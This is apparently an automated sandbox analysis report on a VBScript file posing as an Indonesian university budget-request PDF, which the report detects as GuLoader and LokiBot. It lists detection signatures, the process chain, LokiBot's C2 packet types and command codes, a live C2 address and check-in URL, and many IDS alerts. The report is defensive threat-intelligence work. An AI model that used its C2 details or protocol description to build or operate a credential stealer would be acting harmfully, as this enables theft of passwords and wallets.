Windows Analysis Report
PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs

Overview

General Information

Sample name: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: PERMINTAAN ANGGARAN (Universitas IPB) ID177888pdf.vbs
Analysis ID: 1523886
MD5: cf3ce0d565b919fe45d02705736fe824
SHA1: 0924076c6434b432b18fd0b298a2b5b14e38b754
SHA256: 96c1a11d9036afc58f65d8533f2c37b7fc64048e21bc60f28f0bb9311902e80f

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7352 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script omitted>" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7784 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script omitted>" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8076 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Loki Password Stealer (PWS), LokiBot
Description:
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

FILE EXTENSION | FILE DESCRIPTION
.exe | A copy of the malware that will execute every time the user account is logged into
.lck | A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server
.kdb | A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.
The second packet transmitted by Loki-Bot contains decrypted Windows credentials.
The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.
The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE | PAYLOAD TYPE
0x26 | Stolen Cryptocurrency Wallet
0x27 | Stolen Application Data
0x28 | Get C2 Commands from C2 Server
0x29 | Stolen File
0x2A | POS (Point of Sale?)
0x2B | Keylogger Data
0x2C | Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE | INSTRUCTION DESCRIPTION
0x00 | Download EXE & Execute
0x01 | Download DLL & Load #1
0x02 | Download DLL & Load #2
0x08 | Delete HDB File
0x09 | Start Keylogger
0x0A | Mine & Steal Data
0x0E | Exit Loki-Bot
0x0F | Upgrade Loki-Bot
0x10 | Change C2 Polling Frequency
0x11 | Delete Executables & Exit

Suricata Signatures

RULE SID | RULE NAME
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314 | ET TROJAN Loki Bot File Exfiltration Detected
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7408.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7408.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
                • 0x100e7:$b2: ::FromBase64String(
                • 0xd458:$s1: -join
                • 0x6c04:$s4: +=
                • 0x6cc6:$s4: +=
                • 0xaeed:$s4: +=
                • 0xd00a:$s4: +=
                • 0xd2f4:$s4: +=
                • 0xd43a:$s4: +=
                • 0xf7fc:$s4: +=
                • 0xf87c:$s4: +=
                • 0xf942:$s4: +=
                • 0xf9c2:$s4: +=
                • 0xfb98:$s4: +=
                • 0xfc1c:$s4: +=
                • 0xdc8b:$e4: Get-WmiObject
                • 0xde7a:$e4: Get-Process
                • 0xded2:$e4: Start-Process
amsi32_7784.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (listed below)
                • 0xac7c:$b2: ::FromBase64String(
                • 0x9cf0:$s1: -join
                • 0x349c:$s4: +=
                • 0x355e:$s4: +=
                • 0x7785:$s4: +=
                • 0x98a2:$s4: +=
                • 0x9b8c:$s4: +=
                • 0x9cd2:$s4: +=
                • 0x14412:$s4: +=
                • 0x14492:$s4: +=
                • 0x14558:$s4: +=
                • 0x145d8:$s4: +=
                • 0x147ae:$s4: +=
                • 0x14832:$s4: +=
                • 0xa523:$e4: Get-WmiObject
                • 0xa712:$e4: Get-Process
                • 0xa76a:$e4: Start-Process
                • 0x150a2:$e4: Get-Process

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", ProcessId: 7352, ProcessName: wscript.exe
Source: Network Connection, Author: frack113: Data: DestinationIp: 172.217.18.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 59082
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs", ProcessId: 7352, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script omitted>"


                AV Detection

                Source: http://137.184.191.215/index.php/check.php?s=am9ntjjw, Virustotal: Detection: 15%
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, ReversingLabs: Detection: 18%
                Source: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Virustotal: Detection: 20%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
                Source: unknown, HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:59082 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:59083 version: TLS 1.2
                Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006F2C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1903510778.00000211ABC2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2720499502.0000000008100000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006FEC000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:59085 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59109 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59090 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59096 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59100 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59101 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59089 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59105 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59087 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59092 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59099 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59106 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59102 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59093 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59107 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:59084 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59086 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59091 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59095 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59097 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59110 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59104 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59108 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:59088 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59098 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:59094 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:59108 -> 137.184.191.215:80
